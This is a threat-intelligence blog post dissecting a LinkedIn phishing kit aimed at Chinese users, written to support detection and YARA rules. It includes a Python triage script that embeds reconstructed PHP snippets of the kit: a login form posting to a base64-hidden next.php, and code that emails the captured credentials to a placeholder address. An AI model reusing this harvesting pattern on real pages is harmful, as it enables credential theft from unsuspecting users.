LinkedIn phishing kit targeting Chinese users – an analysis


At StalkPhish we like dissecting phishing kits: first because we write YARA rules to detect them, secondly because we must continually keep up to date with new developments in phishing kits, and finally because we like to pass on to the general public what we learn about this type of threat.

This post was previously published on our LinkedIn page.

On 05/25/2022 our StalkPhish.io infrastructure detected and grabbed a LinkedIn phishing kit targeting Chinese users. We decided to call this kit LinkedIn_Fudsender, in reference to some comments appearing in the page used to send stolen credentials to the actor’s email address.

As you can see below, on the phishing kit landing page, all text is written in Chinese:

Sometimes actors leave the phishing kit source archive on the website they use as a landing page, and the kit can simply be downloaded, which is useful for analysis (do this from an isolated analysis environment, never from a production workstation):

Once the package is retrieved, you can check what’s inside. This kit is particularly simple and efficient: 3 PHP pages, 2 pictures and some jQuery JS files, that’s all:

The index.php, the landing page, presents login fields, written in Chinese, and a background image referring to LinkedIn:

The page only collects the login and password and posts them to the PHP script next.php (the file name is base64 ‘obfuscated’ in the source: “bmV4dC5waHA=” decodes to “next.php”):

The next.php script receives the credentials and sends them by email, using the PHP mail() function, to the address defined in the email.php script ($Receive_email):
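The analysis steps above (decode the base64 literal that hides the target script, find the mail() call that exfiltrates credentials, pull out the receiving address) are easy to automate when triaging a downloaded kit. The script below is an added example written for this post; it is neither the kit’s code nor StalkPhish tooling. The three PHP snippets embedded in it are constructed stand-ins that mimic the behaviour described above (index.php posting to a base64-obfuscated next.php, next.php calling mail() with $Receive_email from email.php); the receiving address is a placeholder, not the actor’s real one.

```python
"""Triage helper for a downloaded phishing kit: decodes base64 string
literals in PHP sources, flags credential-exfiltration calls (mail())
and extracts the receiving email address.  Example code, not the kit."""
import base64
import re

# Constructed stand-ins for the kit's three PHP files (illustrative only).
KIT_FILES = {
    "index.php": r'''<?php $next = base64_decode("bmV4dC5waHA="); ?>
<form method="post" action="<?php echo $next; ?>">
  <input type="text" name="login"><input type="password" name="password">
</form>''',
    "email.php": r'''<?php $Receive_email = "drop-placeholder@example.com"; ?>''',
    "next.php": r'''<?php
include("email.php");
$message = "Login: " . $_POST['login'] . "\nPass: " . $_POST['password'];
mail($Receive_email, "LinkedIn Result", $message);
// header("Location: " . $redirect_link);   // commented out, unused
?>''',
}

# base64_decode("...") with a literal argument; the alphabet check keeps
# the regex from matching variables or concatenations.
B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
# \b prevents matching "email.php" or "$Receive_email".
MAIL_CALL = re.compile(r'\bmail\s*\(')
RECEIVER = re.compile(r'\$Receive_email\s*=\s*["\']([^"\']+)["\']')


def decode_b64_literals(src):
    """Return (encoded, decoded) pairs for every base64_decode() literal
    in src that decodes to printable text (hidden file names, URLs...)."""
    found = []
    for match in B64_LITERAL.finditer(src):
        encoded = match.group(1)
        try:
            decoded = base64.b64decode(encoded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # binary or malformed payload: not a hidden string
        if decoded.isprintable():
            found.append((encoded, decoded))
    return found


def triage_kit(files):
    """Walk a {filename: source} mapping and build a short exfil report."""
    report = {"decoded": {}, "mail_callers": [], "receivers": []}
    for name, src in files.items():
        decoded = decode_b64_literals(src)
        if decoded:
            report["decoded"][name] = decoded
        if MAIL_CALL.search(src):
            report["mail_callers"].append(name)
        report["receivers"].extend(RECEIVER.findall(src))
    return report


if __name__ == "__main__":
    result = triage_kit(KIT_FILES)
    for fname, pairs in result["decoded"].items():
        for enc, dec in pairs:
            print(f"{fname}: base64 {enc!r} -> {dec!r}")
    print("files calling mail():", result["mail_callers"])
    print("exfil addresses:", result["receivers"])
```

On the constructed input the report shows index.php hiding “next.php” behind “bmV4dC5waHA=”, next.php as the only file calling mail(), and the placeholder address as the exfiltration target; the decoded strings and the receiver variable name are exactly the kind of indicators that end up in a YARA rule for this kit.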

As you can read, some parts of the code are commented out or simply unused (the redirect_link is never used), which leads us to believe that this is a modified kit, probably originally supplied by the Fudsender marketplace.

Fudsender makes a business out of selling products dedicated to spam, scam and phishing. Keep in mind, however, that phishing kit sources are often copied and reused by other actors who repackage them, so the marketplace a kit came from does not tell you who is operating it. This page shows a LinkedIn phishing kit sold on the Fudsender marketplace:

Of course we informed the LinkedIn Safety Center of this threat through the page they dedicate to reporting such information.

I hope this short post has helped you understand how this minimalist phishing kit works. If you liked it, don’t hesitate to follow our LinkedIn news as well as our various blog posts and tools dedicated to detecting and fighting phishing. You can also find us on Twitter.